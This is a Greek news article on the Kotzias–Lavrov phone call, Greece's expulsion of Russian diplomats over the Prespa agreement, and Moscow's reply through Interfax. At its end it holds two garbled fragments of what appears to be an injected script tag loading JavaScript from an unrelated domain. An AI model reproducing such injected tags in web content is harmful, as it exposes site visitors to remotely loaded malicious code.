Τηλεφώνημα Κοτζιά – Λαβρόφ: Το ρωσικό φάουλ και η ελληνική απάντηση – Διπλωματικές ντρίπλες από τη Μόσχα

Τηλεφώνημα Κοτζιά – Λαβρόφ: Το ρωσικό φάουλ και η ελληνική απάντηση

Φωτογραφία από την επίσκεψη Λαβρόφ στην Αθήνα, τον Νοέμβριο του 2016

Τι προηγήθηκε της απόφασης να απελαθούν οι δύο διπλωμάτες από τη ρωσική πρεσβεία στην Αθήνα και να κριθούν ανεπιθύμητοι άλλοι δύο. Η συμφωνία για το Σκοπιανό προκαλεί την αντίδραση της Μόσχας, αλλά η Αθήνα θέτει όρια. Κόκκινη γραμμή ότι δεν θα ανεχθεί κινήσεις από τρίτες χώρες που αναμειγνύονται στα εσωτερικά της Ελλάδας θέτει η Αθήνα με αφορμή την εμπλοκή Ρώσων διπλωματών στο Σκοπιανό.

Πριν από την απόφαση της ελληνικής κυβέρνηση να απελάσει τους 2 Ρώσους διπλωμάτες που υπηρετούσαν στη ρωσική πρεσβεία στην Αθήνα και να κρίνει ως ανεπιθύμητους άλλους δύο είχε προηγηθεί τηλεφώνημα του Σεργκέι Λαβρόφ προς τον Νίκο Κοτζιά.

Ο υπουργός Εξωτερικών της Ρωσίας φέρεται να του είπε ότι θα σταματήσει τη συμφωνία στο Συμβούλιο Ασφαλείας του ΟΗΕ. Ο Έλληνας υπουργός, μετά την αρχική του έκπληξη του απάντησε ότι η συμφωνία είναι διακρατική και δεν μπορεί να την σταματήσει κανείς.

Ο Έλληνας πρωθυπουργός πάντως, παρά τις δυσκολίες τόσο από τη ρωσική κυβέρνηση όσο και από τον κυβερνητικό του εταίρο είναι αποφασισμένος να προχωρήσει μέχρι τέλους τη συμφωνία των Πρεσπών.

Χτες οι αρχηγοί κρατών και κυβερνήσεων της Νατοικής Συμμαχίας έλαβαν την απόφασή τους να προσκαλέσουν την κυβέρνηση της ΠΓΔΜ. Στην ανακοίνωσή τους επισήμαναν παράλληλα, ότι η εφαρμογή όλων των προκαθορισμένων εσωτερικών διαδικασιών είναι προϋπόθεση για την επιτυχή ολοκλήρωση της ενταξιακής διαδικασίας.

Σε δύσκολη θέση ο Καμμένος

Το γεγονός ότι οι σύμμαχοι στο ΝΑΤΟ συντάσσονται πλήρως με τις ελληνικές θέσεις διευκολύνει το Μέγαρο Μαξίμου στις κινήσεις του ενώ φέρνει σε δύσκολη θέση τον Πάνο Καμμένο ο οποίος χτες στο περιθώριο της συνόδου του ΝΑΤΟ εμφανίστηκε αντίθετος στο να περάσει η συμφωνία από την Βουλή.

«Δεν πιστεύω ότι μπορεί να περάσει η συμφωνία των Πρεσπών και να εγκριθεί από τη Βουλή. Θα συνεχίσουν να συλλέγουν προσκλήσεις, ίσως βγάζουν και φωτογραφίες αλλά όσο χρησιμοποιούν το όνομα Μακεδονία θα είναι εκτός ΝΑΤΟ. Οσο δεν θα έρθει η συμφωνία στη Βουλή, δεν θα έχουμε εκλογές» υποστήριξε σε συνομιλητές του ο πρόεδρος των Ανεξάρτητων Ελλήνων στις Βρυξέλλες, υπονοώντας ότι όταν έρθει η συμφωνία για κύρωση στη Βουλή θα προκαλέσει εκλογές.

 

Διπλωματικές ντρίπλες από τη Μόσχα

Φωτογραφία από προηγούμενη συνάντηση Τσίπρα - Πούτιν

H Ρωσική Πρεσβεία επιχειρεί να αμβλύνει τις αρνητικές εντυπώσεις από την απόπειρα επηρεασμού της ελληνικής εξωτερικής πολιτικής στο θέμα της ονομασίας της πΓΔΜ. Τηλεγράφημα του Interfax απαντά στο γρίφο: τί θα γίνει με τις επισκέψεις Τσίπρα στη Μόσχα και Λαβρόφ στην Αθήνα;

Με αλλεπάλληλα “μπρος – πίσω” από χθες, η Μόσχα επιχειρεί να διασκεδάσει τις αρνητικές εντυπώσεις μετά τις απελάσεις δύο Ρώσων διπλωματών από την Αθήνα, που ήρθαν ως αντίδραση σε μεθοδεύσεις με στόχο να υπονομευτεί η συμφωνία των Πρεσπών για το θέμα της ονομασίας της πΓΔΜ και την επίλυση του Σκοπιανού.

Καθώς οι σχέσεις Ελλάδας – Ρωσίας βρέθηκαν στο κόκκινο τις τελευταίες 24 ώρες, μέσω τηλεγραφημάτων του πρακτορείου Interfax από τη Μόσχα, η ρωσική πλευρά διαμηνύει ότι – πάντως – επιθυμεί να γίνουν κανονικά οι επισκέψεις Λαβρόφ στην Αθήνα το φθινόπωρο και Τσίπρα στη Μόσχα στα τέλη του 2018.

Τo αναλυτικό τηλεγράφημα του Interfax αναφέρει:

ΜΟΣΧΑ. 11 Ιουλίου (Interfax) – Η Ρωσία είναι αποφασισμένη να αναπτύξει φιλικές σχέσεις με την Ελλάδα και προετοιμάζεται για την επίσκεψη του υπουργού Εξωτερικών Σεργκέι Λαβρόφ στη χώρα αυτή, όπως δήλωσε η Ρώσικη πρεσβεία στην Ελλάδα προς το Interfax την Τετάρτη.

Με βάση τα αποτελέσματα της επίσκεψης του Έλληνα υπουργού Εξωτερικών στη χώρα μας στις 13 Ιουνίου, ετοιμάζουμε την παρουσία του υπουργού Εξωτερικών της Ρωσίας Σεργκέι Λαβρόφ εδώ. Ο υπουργός μας έχει λάβει πρόσκληση. Και στην συνέχεια, θέτουμε τα θεμέλια για την προετοιμασία της επίσκεψης του πρωθυπουργού της Ελλάδας στη χώρα μας. Εκείνος επίσης έχει λάβει πρόσκληση από τον Μάρτιο του τρέχοντος έτους “, δήλωσε εκπρόσωπος της πρεσβείας.

Εκδηλώσεις που σηματοδοτούν την 25η επέτειο από την υπογραφή συνθήκης φιλίας και συνεργασίας μεταξύ Ρωσίας και Ελλάδας πραγματοποιήθηκαν πριν από λίγο καιρό, είπε.

“Ετοιμάζουμε επίσης εκδηλώσεις για την 190η επέτειο από την καθιέρωση διπλωματικών σχέσεων μεταξύ των χωρών μας, η οποία θα πραγματοποιηθεί τον Σεπτέμβριο”, ανέφερε (ο εκπρόσωπος της ρωσικής πρεσβείας στην Αθήνα).

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>